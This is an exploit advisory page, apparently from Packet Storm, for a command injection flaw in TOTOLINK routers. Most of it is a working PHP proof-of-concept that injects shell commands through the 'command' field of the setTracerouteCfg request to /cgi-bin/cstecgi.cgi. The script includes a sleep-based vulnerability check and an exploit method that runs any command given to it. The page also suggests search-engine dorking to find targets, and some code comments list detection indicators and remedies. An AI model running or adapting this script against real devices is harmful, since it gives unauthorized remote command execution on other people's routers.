## https://sploitus.com/exploit?id=PACKETSTORM:182168
=============================================================================================================================================  
| # Title : TOTOLINK 9.x Code Injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |  
| # Vendor : https://www.totolink.net/ |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking In Google Or Other Search Engine.
  
[+] uses the CURL to Allow remote command .  
  
[+] Line 71 set your target .  
  
[+] save code as poc.php .  
  
[+] Usage : cmd => c:\www\test\php poc.php
  
[+] PayLoad :  
  
<?php  
  
/**
 * Proof-of-concept client for the command injection described in this advisory.
 *
 * Every public method ends in the same request: an HTTP POST to
 * <targetUri>/cgi-bin/cstecgi.cgi whose JSON body names the "setTracerouteCfg"
 * topic and carries a "command" field shaped like "127.0.0.1; <cmd>;#".
 * The ';' separators and the trailing '#' only have an effect if the device
 * places that field into a shell command line without neutralising shell
 * metacharacters. NOTE(review): that is presumably what the firmware handler
 * does; the handler itself is not shown on this page.
 *
 * What a defender can take from the listing:
 *  - Log/IDS indicator: POST to /cgi-bin/cstecgi.cgi with topicurl
 *    "setTracerouteCfg" and a "command" value that is anything other than a
 *    plain host name or IP address (';', '#', spaces, ...).
 *  - The request built here carries no cookie or credential header, and it
 *    declares a form-urlencoded Content-Type while the body is JSON.
 *  - Server-side remedy for this bug class: validate the field strictly as an
 *    address and run the traceroute binary with an argument vector, not via a
 *    shell string. Keeping the management interface off untrusted networks
 *    limits exposure in the meantime.
 */
class TotolinkExploit
{
    /** Base URL of the device web interface; the CGI path is appended to it. */
    private $targetUri;

    /** Delay in seconds used by the timing probe in check(). */
    private $sleepTime;

    /**
     * @param string $targetUri Base URL, e.g. scheme plus host, no trailing path.
     * @param int    $sleepTime Seconds the timing probe asks the device to wait.
     */
    public function __construct($targetUri, $sleepTime = 3)
    {
        $this->sleepTime = $sleepTime;
        $this->targetUri = $targetUri;
    }

    /**
     * Build the setTracerouteCfg request around $cmd and send it.
     *
     * "num" is a random integer from 1 to 500; what the device does with it is
     * not visible in this listing.
     *
     * @param string $cmd Text spliced between "127.0.0.1; " and ";#".
     * @return string|false Response body, or false when the HTTP call fails.
     */
    public function executeCommand($cmd)
    {
        $endpoint = $this->targetUri . '/cgi-bin/cstecgi.cgi';
        $body = [
            'command' => '127.0.0.1; ' . $cmd . ';#',
            'num' => rand(1, 500),
            'topicurl' => 'setTracerouteCfg',
        ];

        return $this->sendPostRequest($endpoint, json_encode($body));
    }

    /**
     * Two-step probe: a reachability test, then a timing test.
     *
     * Step one only confirms that the endpoint answered with a body containing
     * the substring "success". Step two measures wall-clock time around a
     * request that embeds "sleep <sleepTime>".
     *
     * The timing verdict is a heuristic: no baseline request is timed, so a
     * slow device or a slow network path also satisfies elapsed >= sleepTime.
     *
     * @return string One of three fixed, newline-terminated verdict messages.
     */
    public function check()
    {
        echo "Checking if the target can be exploited.\n";

        // Endpoint must answer, and the answer must mention "success".
        $reply = $this->executeCommand("echo test");
        $endpointAnswered = $reply && strpos($reply, 'success') !== false;
        if (!$endpointAnswered) {
            return "Target is likely not vulnerable.\n";
        }

        echo "Performing command injection test with sleep of {$this->sleepTime} seconds.\n";
        $startedAt = microtime(true);
        $this->executeCommand("sleep {$this->sleepTime}");
        $elapsedTime = microtime(true) - $startedAt;

        $rounded = round($elapsedTime, 2);
        echo "Elapsed time: {$rounded} seconds.\n";

        return $elapsedTime >= $this->sleepTime
            ? "Target is vulnerable: Blind command injection successful.\n"
            : "Command injection test failed.\n";
    }

    /**
     * Send $payload through executeCommand() and discard the response.
     *
     * Nothing is returned and the outcome is not inspected; the only output is
     * the fixed status line printed before the request.
     *
     * @param string $payload Command text handed to executeCommand().
     */
    public function exploit($payload)
    {
        echo "Executing payload on the target.\n";
        $this->executeCommand($payload);
    }

    /**
     * POST $postFields to $url using a PHP stream context.
     *
     * No timeout, TLS or authentication options are set, so PHP defaults apply.
     * The Content-Type header says form-urlencoded although callers in this
     * class pass a JSON string.
     *
     * @param string $url        Full request URL.
     * @param string $postFields Raw request body.
     * @return string|false Response body, or false on failure.
     */
    private function sendPostRequest($url, $postFields)
    {
        $httpOptions = [
            'method' => 'POST',
            'header' => 'Content-Type: application/x-www-form-urlencoded',
            'content' => $postFields,
        ];
        $context = stream_context_create(['http' => $httpOptions]);

        return file_get_contents($url, false, $context);
    }
}
  
// Usage example from the advisory.
// 'http://target-ip' is the author's placeholder, not a real host.
$targetUri = 'http://target-ip';
$probe = new TotolinkExploit($targetUri);

// check() returns a verdict string; it is printed but not acted upon.
$verdict = $probe->check();
echo $verdict;

// exploit() runs unconditionally, whatever check() reported.
// 'whoami' is the author's sample command.
$probe->exploit('whoami');
  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================